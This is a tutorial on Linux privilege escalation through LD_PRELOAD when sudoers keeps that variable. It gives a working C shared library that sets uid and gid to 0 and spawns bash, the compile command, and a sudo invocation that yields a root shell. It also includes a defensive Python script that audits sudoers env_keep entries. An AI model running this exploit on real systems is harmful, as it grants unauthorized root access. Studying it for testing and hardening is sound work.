
LD_Preload Abuse

LD_PRELOAD is an environment variable in Linux that allows users to load shared libraries before others when running a program.

It can be exploited to load a custom shared library that overrides default functions, a technique often used for privilege escalation.

Key Concepts:

  • Shared Libraries: Code loaded by programs to avoid repetition. Dynamic libraries (.so) can be modified or replaced to manipulate program execution.
  • soname: Special name for shared libraries (e.g., libc.so.6).
  • Dynamic Linker: The loader (/lib/ld-linux.so*) that finds and loads the shared libraries a program needs.
  • LD_PRELOAD: Environment variable used to load a library before others, overriding default function calls (e.g., setuid, setgid, system()).

Exploitation:

  1. Check for sudo permissions:
    Use sudo -l to identify commands you can run as root.

    sudo -l
  2. Look for LD_PRELOAD in sudoers:
    Confirm that the env_keep += LD_PRELOAD directive appears among the Defaults entries in the sudo -l output.

    Matching Defaults entries for user:
    env_keep+=LD_PRELOAD
  3. Create Malicious Shared Library:
    Write a C program that uses setuid(0), setgid(0), and executes a shell to escalate privileges.

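    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    /* _init runs as soon as the library is loaded into the process. */
    void _init() {
        unsetenv("LD_PRELOAD");  /* keep child processes from loading this library again */
        setgid(0);
        setuid(0);
        system("/bin/bash");
    }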
    • Save as ldpreload.c.
  4. Compile the Library:
    Use GCC to compile the C program into a shared object (.so).

    gcc -fPIC -shared -o ldpreload.so ldpreload.c -nostartfiles
  5. Preload the Malicious Library:
    Execute the vulnerable command with the LD_PRELOAD variable pointing to the compiled shared library.

    sudo LD_PRELOAD=/path/to/ldpreload.so [COMMAND]
  6. Obtain Root Access:
    Example:

    # The command can be anything; check 'sudo -l' to know which command to use.
    sudo LD_PRELOAD=/path/to/ldpreload.so find

    Then confirm with:

    id
    whoami
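
For defenders, the precondition in step 2 can be audited directly. The following is an added example, not code from the original page: it replays the env_keep assignments in sudoers-format text and reports every entry that still preserves LD_PRELOAD, including wildcard entries such as LD_*. The names audit_env_keep and logical_lines, the users deploy and backup, and the sample text are assumptions made for illustration; each Defaults scope is tracked independently, included files are not followed, and fnmatch also honours ? and [] (sudoers only uses *), so it may slightly over-match.

```python
import fnmatch
import re

# A Defaults line (optionally scoped, e.g. Defaults:user) and one env_keep assignment.
DEFAULTS_RE = re.compile(r'^Defaults(?P<scope>[:@>!]\S+)?\s+(?P<body>.+)$')
ENV_KEEP_RE = re.compile(r'\benv_keep\s*(?P<op>\+=|-=|=)\s*(?:"(?P<q>[^"]*)"|(?P<b>[^\s,]+))')

def logical_lines(text):
    """Yield (first_line_no, joined_text), joining backslash line continuations."""
    buf, start = "", 0
    for no, raw in enumerate(text.splitlines(), 1):
        start = no if not buf else start
        buf += raw.rstrip()
        if buf.endswith("\\"):
            buf = buf[:-1] + " "
            continue
        yield start, buf
        buf = ""

def audit_env_keep(text, var="LD_PRELOAD"):
    """Return [(scope, line_no, pattern)] for each env_keep entry still preserving var."""
    kept = {}  # scope -> {pattern: line_no}, replayed in file order
    for no, line in logical_lines(text):
        m = DEFAULTS_RE.match(line)  # comment and rule lines do not match
        if not m:
            continue
        scope = m.group("scope") or "global"
        for a in ENV_KEEP_RE.finditer(m.group("body")):
            names = (a.group("q") or a.group("b") or "").split()
            entries = kept.setdefault(scope, {})
            if a.group("op") == "=":       # plain assignment replaces the list
                entries.clear()
            for name in names:
                if a.group("op") == "-=":  # removal is by exact string, not by pattern
                    entries.pop(name, None)
                else:
                    entries[name] = no
    return [(s, n, p) for s, e in kept.items() for p, n in e.items()
            if fnmatch.fnmatchcase(var, p.split("=", 1)[0])]

# Constructed sudoers text for the example (not taken from a real host).
SAMPLE = '''\
Defaults env_keep += "LANG LC_ALL"
Defaults env_keep += LD_PRELOAD
Defaults:deploy env_keep += "COLORS \\
    LD_*"
Defaults:backup env_keep += "LD_PRELOAD"
Defaults:backup env_keep -= "LD_PRELOAD"
'''
```

On the sample, the global entry on line 2 and the LD_* wildcard for deploy on line 3 are reported, while the backup scope is clean because its entry is removed again. Deleting the reported entries from env_keep closes the path described in the steps above.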

More

  1. https://www.hackingarticles.in/linux-privilege-escalation-using-LD_PRELOAD/